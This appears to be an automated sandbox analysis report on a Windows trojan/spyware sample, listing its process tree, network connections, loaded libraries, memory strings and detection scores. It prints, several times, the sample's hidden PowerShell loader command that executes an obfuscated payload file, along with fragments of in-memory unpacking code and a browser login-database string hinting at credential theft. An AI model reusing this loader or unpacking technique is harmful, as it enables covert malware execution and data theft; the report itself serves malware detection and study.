Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000006.00000002.2584830754.0000000022561000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2584830754.000000002284B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000006.00000003.1990290331.0000000005B66000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021708000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000006.00000002.2582989409.0000000021703000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49976 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.7:49977 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49995 version: TLS 1.2

Source: C:\Users\user\Desktop\lkETeneRL3.exe

Code function: 1_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_004051BA

Source: C:\Users\user\Desktop\lkETeneRL3.exe

Code function: 1_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_0040322B

Source: C:\Users\user\Desktop\lkETeneRL3.exe	Code function: 1_2_004049F9	1_2_004049F9
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Code function: 1_2_004064AE	1_2_004064AE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CC147	6_2_004CC147
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CD278	6_2_004CD278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004C5362	6_2_004C5362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CC468	6_2_004CC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CC738	6_2_004CC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CE988	6_2_004CE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CCA08	6_2_004CCA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CCCD8	6_2_004CCCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004C3E09	6_2_004C3E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CCFAA	6_2_004CCFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CA088	6_2_004CA088
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CF961	6_2_004CF961
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004CE97A	6_2_004CE97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_004C6FC8	6_2_004C6FC8

Source: lkETeneRL3.exe

Static PE information: invalid certificate

Source: lkETeneRL3.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/14@6/6

Source: C:\Users\user\Desktop\lkETeneRL3.exe

1_2_0040322B

Source: C:\Users\user\Desktop\lkETeneRL3.exe

Code function: 1_2_00404486 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

1_2_00404486

Source: C:\Users\user\Desktop\lkETeneRL3.exe

Code function: 1_2_0040205E CoCreateInstance,MultiByteToWideChar,

1_2_0040205E

Source: C:\Users\user\Desktop\lkETeneRL3.exe

File created: C:\Users\user\AppData\Roaming\china

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03

Source: C:\Users\user\Desktop\lkETeneRL3.exe

File created: C:\Users\user~1\AppData\Local\Temp\nsj345D.tmp

Jump to behavior

Source: lkETeneRL3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\lkETeneRL3.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lkETeneRL3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 00000006.00000002.2582989409.00000000217DC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000217A9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000217B7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.00000000217E9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2582989409.0000000021799000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: lkETeneRL3.exe	ReversingLabs: Detection: 57%
Source: lkETeneRL3.exe	Virustotal: Detection: 71%

Source: C:\Users\user\Desktop\lkETeneRL3.exe

File read: C:\Users\user\Desktop\lkETeneRL3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lkETeneRL3.exe "C:\Users\user\Desktop\lkETeneRL3.exe"
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\lkETeneRL3.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: justifikationssager.lnk.1.dr

LNK file: ..\..\..\..\..\Filial195.plo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: lkETeneRL3.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((ubiquit $Mogiphonia $Sandals), (Reseason @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Vanke = [AppDomain]::CurrentDomain.GetAssemblies()$global:Fishmong
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Smreriets)), $Opstreg).DefineDynamicModule($Averteringens, $false).DefineType($Femdobledes, $Blufferen, [System.MulticastDelegate])$Ov

Suspicious powershell command line found

Source: C:\Users\user\Desktop\lkETeneRL3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) "
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Reglair=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Peltandra.Ove';$Kursuslreren=$Reglair.SubString(51728,3);.$Kursuslreren($Reglair) "			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_03785366 push ecx; iretd	6_2_0378536D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_03784A2F push ebp; iretd	6_2_03784A34
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_03784812 push ebp; retf	6_2_03784814
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_03785F0E push eax; iretd	6_2_03785F22
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_03782F87 push ecx; retf	6_2_03782F88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_037845C8 push edx; ret	6_2_037845C9
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_03780CA1 push eax; retf	6_2_03780CA2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_03783482 push ebp; retf	6_2_03783484

Source: C:\Users\user\Desktop\lkETeneRL3.exe

File created: C:\Users\user\AppData\Local\Temp\nsv37AB.tmp\nsExec.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\lkETeneRL3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lkETeneRL3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
